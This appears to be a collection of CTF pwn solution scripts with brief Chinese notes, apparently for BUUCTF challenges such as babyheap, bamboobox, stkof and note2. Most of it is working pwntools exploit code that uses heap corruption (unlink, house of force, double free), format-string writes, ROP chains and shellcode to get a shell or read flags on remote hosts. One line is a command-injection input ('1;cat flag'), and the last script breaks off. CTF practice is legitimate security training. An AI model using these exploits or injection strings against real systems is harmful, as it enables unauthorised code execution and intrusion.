覆盖随机数种子
int main(int argc, char const *argv[])
{
srand(0);
for (int i = 0; i < 50 ; ++i)
printf("%d,",rand()%6+1);
return 0;
}
from pwn import *
context.log_level='debug'
r = remote("node3.buuoj.cn", 29826)
nmsl = [2,5,4,2,6,2,5,1,4,2,3,2,3,2,6,5,1,1,5,5,6,3,4,4,3,3,3,2,2,2,6,1,1,1,6,4,2,5,2,5,4,4,4,6,3,2,3,3,6,1]
r.recvuntil(" let me know your name: ")
r.send("A" * 0x40 + p64(0))
for i in nmsl:
r.recvuntil("Give me the point(1~6): ")
r.sendline(str(i))
r.interactive()
from pwn import *
r = remote('node3.buuoj.cn',27835)
context.log_level = 'debug'
def change(offset, num):
r.sendline('3')
r.recvuntil("which number to change:")
r.sendline(str(offset))
r.recvuntil('new number:')
r.sendline(str(num))
r.recvuntil("How many numbers you have:")
r.sendline('1')
r.recvuntil("Give me your numbers")
r.sendline('1')
change(0x84, 0x9b)
change(0x85, 0x85)
change(0x86, 0x04)
change(0x87, 0x08)
r.sendline('5')
r.interactive()
off by null
伪造堆块,off by null改size,free引发堆块合并再拿回来,得到unsorted bin
堆块重叠控制fd,打free_hook
from pwn import *
#context.log_level = 'debug'
#r = remote('node3.buuoj.cn',25567)
r = process('./QCTF_2018_babyheap')
elf = ELF ('./QCTF_2018_babyheap')
libc = ELF('/lib/x86_64-linux-gnu/libc-2.27.so')
def create(size,data):
r.recvuntil('Your choice :')
r.sendline('1')
r.recvuntil('Size:')
r.sendline(str(size))
r.recvuntil('Data:')
r.sendline(data)
def delete(index):
r.recvuntil('Your choice :')
r.sendline('2')
r.recvuntil('Index')
r.sendline(str(index))
def show():
r.recvuntil('Your choice :')
r.sendline('3')
create(0xf8,'')
create(0x648,'a'*0x5f0+p64(0x600))
create(0x500,'')
create(0x100,'')
delete(0)
delete(1)
create(0xf8,'b'*0xf8)
create(0x4f8,'')
create(0xf8,'')
delete(1)
delete(2)
create(0x4f8,'')
show()
r.recvuntil('4 : ')
libc_base = u64(r.recv(6)+'\x00'*2)-0x3ebca0
log.success(hex(libc_base))
create(0xf8,'')
delete(4)
delete(2)
free_hook = libc_base + libc.sym['__free_hook']
system = libc_base + libc.sym['system']
create(0xf8,p64(free_hook))
create(0xf8,p64(free_hook))
create(0xf8,p64(system))
create(0xf8,'/bin/sh\x00')
delete(6)
r.interactive()
unque去重没有删除元素,只是把重复元素放到数组后面
可以泄露canary和libc_start_main+231
from pwn import *
r = remote('node3.buuoj.cn',25366)
#r = process('./QCTF_2018_babycpp')
elf = ELF('./QCTF_2018_babycpp')
libc = ELF('/libc-2.27.so')
def change(num):
r.recvuntil('> ')
r.sendline('1')
r.sendline(str(num))
def get(array):
r.recvuntil('> ')
r.sendline('2')
r.recvuntil('num:')
r.sendline(array)
def unique():
r.recvuntil('> ')
r.sendline('3')
def get_data(l,h):
if l < 0:
l = 0x100000000 + l
if h < 0:
h = 0x100000000 + h
data = h*0x100000000 + l
return data
r.recvuntil('input n:')
r.sendline('22')#22*4=88
get('1 '*22)
change(28)
unique()
r.recvuntil('1 ')
canary_l = int(r.recvuntil(' '))
canary_h = int(r.recvuntil(' '))
canary = get_data(canary_l,canary_h)
log.success(hex(canary))
leak_l = int(r.recvuntil(' '))
leak_h = int(r.recvuntil(' '))
leak = get_data(leak_l,leak_h)
log.success(hex(leak))
leak_l = int(r.recvuntil(' '))
leak_h = int(r.recvuntil(' '))
leak = get_data(leak_l,leak_h)
log.success(hex(leak))
libc_base = leak-231-libc.sym['__libc_start_main']
log.success(hex(libc_base))
one = libc_base+0x4f322
one_l = one%0x100000000
if one_l > 0x7fffffff:
one_l = 0x100000000-one_l
one_h = one>>32
log.info(str(one_l))
log.info(str(one_h))
get('1 '*22+str(canary_l)+' '+str(canary_h)+' '+'1 1 '+str(one_l)+' '+str(one_h))
r.sendline('4')
r.interactive()
from pwn import *
r = remote('node3.buuoj.cn',29497)
r.sendline('-1')
payload = 'a'*0x18 + p64(0x4006e6)
r.sendline(payload)
r.interactive()
from pwn import *
r = remote('node3.buuoj.cn',27189)
payload = 'a'*0x18 + p64(0x400726)
r.sendline('-1')
r.sendline(payload)
r.interactive()
from pwn import *
r = remote('node3.buuoj.cn',28246)
elf = ELF('./bjdctf_2020_babyrop')
libc = ELF('./libc-2.23.so')
vuln = elf.symbols['vuln']
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
pop_rdi_ret = 0x400733
payload = 'a'*0x28+p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(vuln)
r.recvuntil('story!\n')
r.sendline(payload)
leak = u64(r.recvuntil('\n',drop=True).ljust(8,"\x00"))
libc_base = leak - libc.sym['puts']
system_addr = libc_base + libc.sym['system']
binsh_addr = libc_base + libc.search("/bin/sh").next()
payload = 'a'*0x28+p64(pop_rdi_ret)+p64(binsh_addr)+p64(system_addr)
r.recvuntil('story!\n')
r.sendline(payload)
r.interactive()
from pwn import *
r = remote('node3.buuoj.cn',26046)
def add(size,name):
r.recvuntil('Your choice :')
r.sendline('1')
r.recvuntil('Her name size is :')
r.sendline(str(size))
r.recvuntil('Her name is :')
r.sendline(name)
def free(index):
r.recvuntil('Your choice :')
r.sendline('2')
r.recvuntil('Index :')
r.sendline(str(index))
def show(index):
r.recvuntil('Your choice :')
r.sendline('3')
r.recvuntil('Index :')
r.sendline(str(index))
add(0x80,'fuck')
add(0x80,'fuck')
free(0)
free(1)
add(0x10,p64(0x400B9C))
show(0)
r.interactive()
from pwn import *
r = remote('node3.buuoj.cn',28026)
fuck = 0x8048945
def add(size,content):
r.recvuntil('Your choice :')
r.sendline('1')
r.recvuntil('Note size :')
r.sendline(str(size))
r.recvuntil('Content :')
r.sendline(content)
def free(index):
r.recvuntil('Your choice :')
r.sendline('2')
r.recvuntil('Index :')
r.sendline(str(index))
def show(index):
r.recvuntil('Your choice :')
r.sendline('3')
r.recvuntil('Index :')
r.sendline(str(index))
add(0x60,'fuck')
add(0x60,'fuck')
free(0)
free(1)
add(0x60,p32(fuck))
show(0)
r.interactive()
off by one
pwndbg> x/64gx 0x17fb000
0x17fb000: 0x0000000000000000 0x0000000000000021//0
0x17fb010: 0x0000000000000018 0x00000000017fb030
0x17fb020: 0x0000000000000000 0x0000000000000021//0
0x17fb030: 0x6161616161616161 0x6161616161616161
0x17fb040: 0x6161616161616161 0x0000000000000041//1
0x17fb050: 0x0000000000000000 0x0000000000000000
0x17fb060: 0x0000000000000000 0x0000000000000021//1
0x17fb070: 0x0000000000000038 0x0000000000602028//content_ptr(puts_got)
0x17fb080: 0x000000000000000a 0x0000000000020f81
from pwn import *
r = remote('node3.buuoj.cn',25620)
#r = process('./heapcreator')
elf = ELF('./heapcreator')
libc = ELF('/libc-2.23.so')
def create(szie,content):
r.recvuntil('Your choice :')
r.sendline('1')
r.recvuntil(':')
r.sendline(str(szie))
r.recvuntil(':')
r.sendline(content)
def edit(index,content):
r.recvuntil('Your choice :')
r.sendline('2')
r.recvuntil(':')
r.sendline(str(index))
r.recvuntil(':')
r.sendline(content)
def show(index):
r.recvuntil('Your choice :')
r.sendline('3')
r.recvuntil(':')
r.sendline(str(index))
def free(index):
r.recvuntil('Your choice :')
r.sendline('4')
r.recvuntil(':')
r.sendline(str(index))
puts_got = elf.got['puts']
create(0x18,'fuck')
create(0x18,'fuck')
edit(0,'a'*0x18+'\x41')
free(1)
create(0x38,'aaaa')
edit(1,p64(0)*3+p64(0x21)+p64(0x38)+p64(puts_got))
show(1)
r.recvuntil('Content : ')
leak = r.recvuntil('\n',drop=True)
leak = leak.ljust(8,'\x00')
leak = u64(leak)
log.success(hex(leak))
libc_base = leak - libc.sym['puts']
log.success(hex(libc_base))
one = libc_base + 0xf02a4
edit(1,p64(one))
r.interactive()
house of force
有个放着hello_message和goodbye_message函数的白给chunk,把goodbye_message改成magic,exit拿flag
edit size没验,可以溢出改top chunk size,把指针抬到白给chunk
from pwn import *
r = remote('node3.buuoj.cn',28044)
#r = process('./bamboobox')
elf = ELF('./bamboobox')
magic = 0x400d49
def show():
r.sendlineafter('Your choice:','1')
def add(size,name):
r.sendlineafter('Your choice:','2')
r.sendlineafter('name:',str(size))
r.sendlineafter('item:',name)
def edit(index,size,name):
r.sendlineafter('Your choice:','3')
r.sendlineafter('item:',str(index))
r.sendlineafter('name:',str(size))
r.sendafter('item:',name)
def free(index):
r.sendlineafter('Your choice:','4')
r.sendlineafter('item:',str(index))
add(0x60,'fuck')
edit(0,0x70,'a'*0x60+p64(0)+'\xff'*8)
add(-0x70-0x20-0x10,'aaaa')
add(0x20,p64(magic)*2)
r.interactive()
但是靶🐓里没有/home/bamboobox/flag,👴得getshell
unlink打0x6020C8
from pwn import *
r = remote('node3.buuoj.cn',27947)
#r = process('./bamboobox')
elf = ELF('./bamboobox')
libc = ELF('/libc-2.23.so')
def show():
r.sendlineafter('Your choice:','1')
def add(size,name):
r.sendlineafter('Your choice:','2')
r.sendlineafter('name:',str(size))
r.sendlineafter('item:',name)
def edit(index,size,name):
r.sendlineafter('Your choice:','3')
r.sendlineafter('item:',str(index))
r.sendlineafter('name:',str(size))
r.sendafter('item:',name)
def free(index):
r.sendlineafter('Your choice:','4')
r.sendlineafter('item:',str(index))
add(0x60, 'fuck')
add(0x80, 'fuck')
add(0x60, 'fuck')
ptr = 0x6020C8
fake_chunk = p64(0)#prev_size
fake_chunk += p64(0x61)#size
fake_chunk += p64(ptr - 0x18)#fd
fake_chunk += p64(ptr - 0x10)#bk
fake_chunk += p64(0)*8#padding
fake_chunk += p64(0x60)#prev_size
fake_chunk += p64(0x90)#size
edit(0, 0x80, fake_chunk)
free(1)#unlink
payload = p64(0)*2+p64(0x40)+p64(elf.got['atoi'])
edit(0, 0x80, payload)
show()
r.recvuntil('0 : ')
atoi_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, '\x00'))
libc_base = atoi_addr - libc.sym['atoi']
log.success(hex(libc_base))
system = libc_base + libc.sym['system']
edit(0, 0x8, p64(system))
r.recvuntil(':')
r.sendline('/bin/sh\x00')
r.interactive()
unlink打0x602140
from pwn import *
r = remote('node3.buuoj.cn',29409)
#r = process('./stkof')
elf = ELF('./stkof')
libc = ELF('/libc-2.23.so')
#context.log_level='debug'
def add(size):
r.sendline('1')
r.sendline(str(size))
r.recvuntil('OK')
def edit(index, size, content):
r.sendline('2')
r.sendline(str(index))
r.sendline(str(size))
r.send(content)
r.recvuntil('OK')
def free(index):
r.sendline('3')
r.sendline(str(index))
add(0x60)
add(0x60)
add(0x80)
add(0x60)
ptr = 0x602140+0x10
fake_chunk = p64(0)#prev_size
fake_chunk += p64(0x61)#size
fake_chunk += p64(ptr-0x18)#fd
fake_chunk += p64(ptr-0x10)#bk
fake_chunk += p64(0)*8#padding
fake_chunk += p64(0x60)#prev_size
fake_chunk += p64(0x90)#size
edit(2,len(fake_chunk),fake_chunk)
free(3)#unlink
payload = p64(0)*2+p64(elf.got['free']) + p64(elf.got['atoi']) + p64(elf.got['atoi'])
edit(2,len(payload),payload)
payload = p64(elf.plt['puts'])
edit(1, len(payload), payload)
free(2)
r.recvline()
r.recvline()
leak = u64(r.recv(6).ljust(8,'\x00'))
libc_base = leak-libc.sym['atoi']
log.success(hex(libc_base))
one = libc_base+0x4526a
payload = p64(one)
edit(3,len(payload),payload)
r.interactive()
from pwn import *
context_arch='amd64'
r = remote('node3.buuoj.cn',26465)
shellcode1 = '''
push 0x67616c66
mov rdi,rsp
push 0
pop rsi
push 0x28
pop rdx
push 2
pop rax
syscall
mov rdi,rax
mov rsi,rsp
push 0
pop rax
syscall
push 1
pop rdi
push 1
pop rax
syscall
'''
shellcode1 = asm(shellcode1,arch='amd64',os='linux')
log.info(hex(len(shellcode1)))
shellcode2 = '''
sub rsp,0x30
jmp rsp
'''
shellcode2 = asm(shellcode2,arch='amd64',os='linux')
log.info(hex(len(shellcode2)))
jmp_rsp = 0x400a01
payload=shellcode1.rjust(0x28,'\x90')+p64(jmp_rsp)+shellcode2
r.sendline(payload)
r.interactive()
#flag{f206f83f-ddae-48de-a6fc-af7d728df04
#flag{f206f83f-ddae-48de-a6fc-af7d728df04f}
flag读到rsp只能出0x28位,剩下两位出不来,最后一位},还有一位,👴选择爆破平台
unsigned int fuck_name()
{
char s; // [esp+1Ch] [ebp-5Ch]
char *v2; // [esp+5Ch] [ebp-1Ch]
unsigned int v3; // [esp+6Ch] [ebp-Ch]
v3 = __readgsdword(0x14u);
memset(&s, 0, 0x50u);
puts("Input your name:");
get_content((int)&s, 0x40, 10);
v2 = (char *)malloc(0x40u);
dword_804B0CC = (int)v2;
strcpy(v2, &s);
print_fuck((int)v2);
return __readgsdword(0x14u) ^ v3;
}
s填满,s和v2中间没\0,strcpy直接全写到v2里,然后打印出来,可以泄露堆地址
unsigned int fuck_org_host()
{
char s; // [esp+1Ch] [ebp-9Ch]
char *v2; // [esp+5Ch] [ebp-5Ch]
int v3; // [esp+60h] [ebp-58h]
char *v4; // [esp+A4h] [ebp-14h]
unsigned int v5; // [esp+ACh] [ebp-Ch]
v5 = __readgsdword(0x14u);
memset(&s, 0, 0x90u);
puts("Org:");
get_content((int)&s, 64, 10);
puts("Host:");
get_content((int)&v3, 64, 10);
v4 = (char *)malloc(0x40u);
v2 = (char *)malloc(0x40u);
dword_804B0C8 = (int)v2;
dword_804B148 = (int)v4;
strcpy(v4, (const char *)&v3);
strcpy(v2, &s);
puts("OKay! Enjoy:)");
return __readgsdword(0x14u) ^ v5;
}
s填满,s和v3都进v2,v2连着top chunk,能改top chunk size
把top chunk挪到放堆指针的地方,然后打got表基本操作
from pwn import *
r = remote('node3.buuoj.cn',26911)
#r = process('./bcloud_bctf_2016')
elf = ELF('./bcloud_bctf_2016')
libc = ELF('./libc-2.23.so')
def add(size,content):
r.sendlineafter('option--->>','1')
r.sendlineafter('note content:',str(size))
r.sendlineafter('content:',content)
def edit(index,content):
r.sendlineafter('option--->>','3')
r.sendlineafter('id:',str(index))
r.sendlineafter('content:',content)
def free(index):
r.sendlineafter('option--->>','4')
r.sendlineafter('id:',str(index))
def syn():
r.sendlineafter('option--->>','5')
atoi_got = elf.got['atoi']
free_got = elf.got['free']
puts_plt = elf.plt['puts']
log.info(hex(free_got))
log.info(hex(atoi_got))
r.recvuntil('Input your name:')
r.send('a'*0x40)
r.recvuntil('a'*0x40)
leak_heap = u32(r.recvuntil('!',drop=True))-8
log.success(hex(leak_heap))
r.recvuntil('Org:')
r.send('a'*0x40)
r.recvuntil('Host:')
r.sendline(p32(0xffffffff))
fuck_addr = 0x804B0A0
#note:0x804B120
size = -(leak_heap+3*0x48+0x10-fuck_addr)
add(size,'fuck')
add(0x400,p32(8)*32+p32(free_got)+p32(atoi_got)+p32(atoi_got))
edit(0,p64(puts_plt))
free(1)
r.recv(1)
atoi_leak = u32(r.recvuntil('\nDelete',drop=True))
libc_base = atoi_leak - libc.sym['atoi']
log.success(hex(libc_base))
system = libc_base + libc.sym['system']
edit(2,p32(system))
r.sendline('/bin/sh\x00')
r.interactive()
from pwn import *
r = remote('node3.buuoj.cn',26394)
elf = ELF('./simplerop')
read_plt = elf.symbols['read']
bss_addr = elf.bss()
pop_edx_ecx_ebx_ret = 0x0806e850
pop_eax_ret = 0x080bae06
int80 = 0x080493e1
payload = 'a'*0x1c+'fuck'+p32(read_plt)+p32(pop_edx_ecx_ebx_ret)+p32(0)+p32(bss_addr)+p32(0x8)
payload += p32(pop_edx_ecx_ebx_ret)+p32(0)+p32(0)+p32(bss_addr)
payload += p32(pop_eax_ret)+p32(11)+p32(int80)
r.sendlineafter(' :', payload)
r.sendline('/bin/sh\x00')
r.interactive()
from pwn import *
r = remote('node3.buuoj.cn',28450)
elf = ELF('./pwnme1')
libc = ELF('./libc-2.23.so')
r.sendline('5')
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
payload = 'a'*0xa8+p32(puts_plt)+p32(0x80486f4)+p32(puts_got)
r.sendline(payload)
r.recvuntil('...\n')
leak = u32(r.recv(4))
libc_base = leak-libc.sym['puts']
log.success(hex(libc_base))
system = libc_base+libc.sym['system']
binsh = libc_base+libc.search('/bin/sh\x00').next()
r.sendline('5')
payload = 'a'*0xa8+p32(system)+p32(0x80486f4)+p32(binsh)
r.sendline(payload)
r.interactive()
from pwn import *
r = remote('node3.buuoj.cn',28998)
elf = ELF('pwnme2')
gets_plt = elf.plt['gets']
string = 0x804A060
fuck_func = 0x80485CB
payload = 'a'*0x70+p32(gets_plt)+p32(fuck_func)+p32(string)
r.sendline(payload)
r.sendline('/flag')
r.interactive()
from pwn import *
r = remote('node3.buuoj.cn',27047)
elf = ELF('./axb_2019_fmt32')
libc = ELF('./libc-2.23.so')
printf_got = elf.got['printf']
r.recvuntil('me:')
r.sendline("%9$s#" + p32(printf_got))
r.recvuntil('Repeater:')
puts_leak = r.recv(4)
libc_base = u32(puts_leak)-libc.sym['printf']
log.success(hex(libc_base))
one = libc_base + 0x3a80c
payload = 'a'+fmtstr_payload(8,{0x804A014:one},numbwritten = 10)
r.recvuntil('me:')
r.sendline(payload)
r.interactive()
from pwn import *
r = remote('node3.buuoj.cn',27287)
elf = ELF('./bof')
libc = ELF('./libc-2.23.so')
pop3_ret = 0x08048629
write_plt = elf.plt['write']
write_got = elf.got['write']
main = elf.sym['main']
print(hex(main))
payload = 'a'*0x70+p32(write_plt)+p32(0x080484d6)+p32(1)+p32(write_got)+p32(4)
r.recvuntil('XDCTF2015~!\n')
r.sendline(payload)
write_leak = u32(r.recv(4))
libc_base = write_leak-libc.sym['write']
log.success(hex(libc_base))
system = libc_base+libc.sym['system']
binsh = libc_base + libc.search(b'/bin/sh\x00').next()
payload = 'a'*0x70+p32(system)+p32(0)+p32(binsh)
r.sendline(payload)
r.interactive()
from pwn import *
r = remote('node3.buuoj.cn',27250)
elf = ELF('./axb_2019_fmt64')
libc = ELF('/libc-2.23.so')
sprintf_got = elf.got['sprintf']
payload = '%9$sfuck'+p64(sprintf_got)
log.info(hex(sprintf_got))
r.recvuntil(':')
r.sendline(payload)
r.recvuntil('Repeater:')
sprintf_leak = u64(r.recvuntil('fuck',drop=True).ljust(8,'\x00'))
libc_base = sprintf_leak-libc.sym['sprintf']
log.success(hex(libc_base))
one = libc_base+0x45216
log.info(hex(one))
fuck1 = one & 0xffff
fuck2 = (one >> 16) & 0xffff
payload = ''
payload += '%' + str(fuck1 - 9) + 'c%12$hn'
payload += '%' + str(fuck2-fuck1) + 'c%13$hn'
payload = payload.ljust(0x20,'\x00')
payload += p64(sprintf_got) + p64(sprintf_got + 2)
r.recvuntil(':')
r.sendline(payload)
r.interactive()
from pwn import *
r = remote('node3.buuoj.cn',26021)
elf = ELF('./axb_2019_brop64')
libc = ELF('/libc-2.23.so')
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
pop_rdi_ret = 0x400963
main = 0x4007D6
payload = 'a'*0xd8+p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(main)
r.sendline(payload)
puts_leak = u64(r.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
libc_base = puts_leak - libc.sym['puts']
log.success(hex(libc_base))
one = libc_base+0x45216
payload = 'a'*0xd8+p64(one)
r.sendline(payload)
r.interactive()
from pwn import *
r = remote('node3.buuoj.cn',27349)
elf = ELF('./orw')
bss = elf.bss()
shellcode = shellcraft.open('flag')
shellcode += shellcraft.read(3,bss,0x200)
shellcode += shellcraft.write(1,bss,0x200)
print(shellcode)
shellcode = asm(shellcode)
r.sendline(shellcode)
r.interactive()
uaf
from pwn import *
r = remote('node3.buuoj.cn',27529)
#r = process('./itemboard')
elf = ELF('./itemboard')
libc = ELF('/libc-2.23.so')
def add(name,size,des):
r.sendlineafter('choose','1')
r.sendlineafter('name',name)
r.sendlineafter('len',str(size))
r.sendlineafter('Description?',des)
def list():
r.sendlineafter('choose','2')
def show(index):
r.sendlineafter('choose','3')
r.sendlineafter('Which item?',str(index))
def free(index):
r.sendlineafter('choose','4')
r.sendlineafter('Which item?',str(index))
add('fuck',0x400,'wdnmd')
add('fuck',0x40,'wdnmd')
add('fuck',0x40,'wdnmd')
free(0)
show(0)
r.recvuntil('Description:')
main_arena = u64(r.recvuntil('\n',drop=True).ljust(8,'\x00'))-88
libc_base = main_arena-0x3c4b20
log.success(hex(libc_base))
system = libc_base+libc.sym['system']
log.success(hex(system))
free(1)
free(2)
add('aaaa',0x18,'/bin/sh;'+'a'*8+p64(system))
free(1)
r.interactive()
from pwn import *
r = remote('node3.buuoj.cn',29463)
elf = ELF('./level1')
payload = 0x8c*'a'+p32(elf.plt['read'])+p32(elf.bss())+p32(0)+p32(elf.bss())+p32(0x100)
r.sendline(payload)
r.sendline(asm(shellcraft.sh()))
r.interactive()
from pwn import *
r = remote('node3.buuoj.cn', 26795)
#r = process('./level3_x64')
elf = ELF('./level3_x64')
libc = ELF('/libc-2.23.so')
padding = 'a' * (0x80 + 0x8)
pwn_addr = 0x4005E6
write_plt = elf.plt['write']
write_got = elf.got['write']
write_libc = libc.symbols['write']
read_plt = elf.plt['read']
mprotect_libc = libc.symbols['mprotect']
pop_rdi_ret = 0x4006b3
pop_rsi_p_r_ret = 0x4006b1
payload = padding
payload += p64(pop_rdi_ret) + p64(1)
payload += p64(pop_rsi_p_r_ret) + p64(write_got) + p64(8)
payload += p64(write_plt)
payload += p64(pwn_addr)
r.recvuntil('Input:\n')
r.sendline(payload)
leak_addr = u64(r.recv(8))
libc_base = leak_addr - write_libc
mprotect = libc_base + libc.symbols['mprotect']
log.success(hex(libc_base))
payload = padding+p64(libc_base+0xf02a4)
r.sendline(payload)
r.interactive()
var可以添加add等已存在函数
from pwn import *
r = remote('node3.buuoj.cn',27249)
payload = 'var add = \"'+asm(shellcraft.sh())+'\"'
r.recvuntil('>')
r.sendline(payload)
r.sendline('+')
r.interactive()
from pwn import *
r = remote('node3.buuoj.cn',29175)
shellcode = '\x31\xf6\x48\xbf\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdf\xf7\xe6\x04\x3b\x57\x54\x5f\x0f\x05'
print(disasm(shellcode))
r.recvuntil("[*]Location:")
buf_addr = int(r.recvuntil('\n',drop=True), 16)
payload = shellcode.ljust(0x28,'\x90') + p64(buf_addr)
r.recvuntil('[*]Command:')
r.sendline(payload)
r.interactive()
from pwn import *
start = 0x400550
r = remote('node3.buuoj.cn',27634)
#r = process('./main')
libc = ELF('./libc-2.27.so')
elf = ELF('./main')
r.recvuntil('inputz: \n')
payload = '%2$pfuck'.ljust(0x48, 'a') + p64(start)
r.sendline(payload)
libc_base = int(r.recvuntil('fuck',drop=True), 16) +0x10-libc.sym['__after_morecore_hook']
log.success(hex(libc_base))
one = libc_base + 0x4f322
r.recvuntil(': ')
r.sendline(('a'*0x48 + p64(one)))
r.interactive()
add时size没验,可以malloc(0)
在这a2=0,a2-1=-1,无符号数比较,产生溢出
unsigned __int64 __fastcall sub_4009BD(__int64 a1, __int64 a2, char a3)
{
char v4; // [rsp+Ch] [rbp-34h]
char buf; // [rsp+2Fh] [rbp-11h]
unsigned __int64 i; // [rsp+30h] [rbp-10h]
ssize_t v7; // [rsp+38h] [rbp-8h]
v4 = a3;
for ( i = 0LL; a2 - 1 > i; ++i )
{
v7 = read(0, &buf, 1uLL);
if ( v7 <= 0 )
exit(-1);
if ( buf == v4 )
break;
*(i + a1) = buf;
}
*(a1 + i) = 0;
return i;
}
只能add3次,先add三个,第一个把fakechunk的一部分布置好,第二个是可以溢出的chunk,free后再申请可以回来溢出,布置剩下的fakechunk
from pwn import *
r = remote('node3.buuoj.cn',28075)
#r = process('./note2')
elf = ELF('./note2')
libc = ELF('/libc-2.23.so')
#context.log_level = 'debug'
def add(size,content):
r.recvuntil('option--->>')
r.sendline('1')
r.recvuntil('(less than 128)')
r.sendline(str(size))
r.recvuntil('content:')
r.sendline(content)
def show(index):
r.recvuntil('option--->>')
r.sendline('2')
r.recvuntil('note:')
r.sendline(str(index))
def edit(index,content):
r.recvuntil('option--->>')
r.sendline('3')
r.recvuntil('note:')
r.sendline(str(index))
r.recvuntil('2.append')
r.sendline('1')
r.sendline(content)
def free(index):
r.recvuntil('option--->>')
r.sendline('4')
r.recvuntil('note:')
r.sendline(str(index))
ptr = 0x602120
r.sendline('wdnmd')
r.sendline('nmsl')
fake_chunk = p64(0)#prev_size
fake_chunk += p64(0xa1)#size
fake_chunk += p64(ptr-0x18)#fd
fake_chunk += p64(ptr-0x10)#bk
add(0x80,fake_chunk)
add(0,'fuck')
add(0x80,'fuck')
free(1)
fake_chunk = p64(0)*2
fake_chunk += p64(0xa0)#prev_size
fake_chunk += p64(0x90)#size
add(0,fake_chunk)
free(2)#unlink
edit(0,'a'*0x18+p64(elf.got['atoi']))
show(0)
r.recvuntil('is ')
libc_base = u64(r.recv(6).ljust(8, '\x00')) - libc.symbols['atoi']
log.success(hex(libc_base))
system = libc_base+libc.sym['system']
edit(0,p64(system))
r.sendline('/bin/sh\x00')
r.interactive()
unsortedbin attack打magic
from pwn import *
r = remote('node3.buuoj.cn',26152)
#r = process('./magicheap')
def add(size,content):
r.recvuntil(':')
r.sendline('1')
r.recvuntil(':')
r.sendline(str(size))
r.recvuntil(':')
r.sendline(content)
def edit(index,size,content):
r.recvuntil(':')
r.sendline('2')
r.recvuntil(':')
r.sendline(str(index))
r.recvuntil(':')
r.sendline(str(size))
r.recvuntil(':')
r.sendline(content)
def free(index):
r.recvuntil(':')
r.sendline('3')
r.recvuntil(':')
r.sendline(str(index))
magic = 0x6020A0
add(0x80,'fuck')
add(0x80,'fuck')
add(0x80,'fuck')
free(1)
payload = 'a'*0x80+p64(0)+p64(0x91)+p64(0)+p64(magic-0x10)
edit(0,0x100,payload)
add(0x80,'fuck')
r.sendline('4869')
r.interactive()
fastbin double free
👴寻思能直接打到got表,但是magic写进去直接崩,所以👴选择malloc_hook
from pwn import *
r = remote('node3.buuoj.cn',28995)
#r = process('./secretgarden')
libc = ELF('/libc-2.23.so')
elf = ELF('./secretgarden')
def add(size,name,color):
r.sendlineafter('Your choice :','1')
r.sendlineafter('Length of the name :',str(size))
r.sendafter('The name of flower :',name)
r.sendlineafter('The color of the flower :',color)
def visit():
r.sendlineafter('Your choice :','2')
def free(index):
r.sendlineafter('Your choice :','3')
r.sendlineafter('garden:',str(index))
def clean():
r.sendlineafter('Your choice :','4')
#context.log_level = 'debug'
magic = 0x400c5e
add(0x90,'fuck','nmsl')
add(0x60,'fuck','nmsl')
free(0)
clean()
add(0x90,'a'*8,'nmsl')
visit()
r.recvuntil('a'*8)
libc_base = u64(r.recv(6).ljust(8,'\x00'))-0x3c4b78
log.success(hex(libc_base))
malloc_hook = libc_base +libc.sym['__malloc_hook']
log.success(hex(malloc_hook))
add(0x68,'wdnmd','nmsl')
add(0x68,'wdnmd','nmsl')
add(0x68,'wdnmd','nmsl')
free(2)
free(3)
free(2)
add(0x68,p64(malloc_hook-0x23),'nmsl')
add(0x68,'wdnmd','nmsl')
add(0x68,'wdnmd','nmsl')
add(0x68,'a'*0x13+p64(magic),'nmsl')
r.interactive()
先搞出来一个unsortedbin,fd有main_arena+88,继续申请能申请到main_arena+88,main_arena+88的地址就会写到heap_store,然后改fd打到heap_store改main_arena+88一字节到malloc_hook,同时把rwx页地址写上去,然后写shellcode再写malloc_hook
from pwn import *
r = remote('node3.buuoj.cn',29770)
#r = process('./QCTF_2018_NoLeak')
elf = ELF('./QCTF_2018_NoLeak')
def add(size,data):
r.sendlineafter('Your choice :','1')
r.sendlineafter('Size: ',str(size))
r.sendafter('Data: ',data)
def free(index):
r.sendlineafter('Your choice :','2')
r.sendlineafter('Index: ',str(index))
def edit(index,data):
r.sendlineafter('Your choice :','3')
r.sendlineafter('Index: ',str(index))
r.sendlineafter('Size: ',str(len(data)))
r.sendafter('Data: ',data)
shellcode = '\x6a\x42\x58\xfe\xc4\x48\x99\x52\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5e\x49\x89\xd0\x49\x89\xd2\x0f\x05'
fuck_addr = 0x601030
add(0x80,'fuck')
add(0x80,'fuck')
for i in range(8):
free(0)
add(0x80,p64(0)+p64(0x601030))
add(0x80,'wdnmd')
free(0)
edit(0,p64(0x601030))
add(0x80,'fuck')
add(0x80,p64(0)*2+p64(0x601000)+p64(0)*2+'\x30')
edit(0,shellcode)
edit(3,p64(0x601000))
r.interactive()
for i in range(7):
free(2)
r.interactive()
白给
1
1;cat flag
from pwn import *
r = remote('node3.buuoj.cn',26362)
elf = ELF('./echo')
system_plt = elf.plt['system']
printf_got = elf.got['printf']
payload = fmtstr_payload(7, {printf_got: system_plt})
r.sendline(payload)
r.sendline('/bin/sh\x00')
r.interactive()
from pwn import *
context.os = 'linux'
context.arch = 'amd64'
r = remote('node3.buuoj.cn', 27888)
def fuck(addr, val):
r.recvuntil('Where What?')
r.sendline((hex(addr)+' '+str(val)))
shellcode = asm(shellcraft.sh())
addr = 0x400769
for i in range(len(shellcode)):
fuck(addr+i,ord(shellcode[i]))
fuck(0x400768, 0xff)
r.interactive()
0x6020E0储存note存在的标志和name和堆指针,输入name时有off-by-null,可以把堆指针覆盖为以\x00结尾的堆指针,造成uaf
from pwn import *
r = remote('node3.buuoj.cn',29000)
#r = process('./X-nuca_2018_0gadget')
elf = ELF('./X-nuca_2018_0gadget')
libc = ELF('/libc-2.27.so')
def add(size,title,content):
r.recvuntil('Your choice: ')
r.sendline('1')
r.recvuntil('note size: ')
r.sendline(str(size))
r.recvuntil('the title: ')
r.sendline(title)
r.recvuntil('the content: ')
r.sendline(content)
r.recvuntil('REMARK: ')
r.sendline('nmsl')
def free(index):
r.recvuntil('Your choice: ')
r.sendline('2')
r.recvuntil('to delete: ')
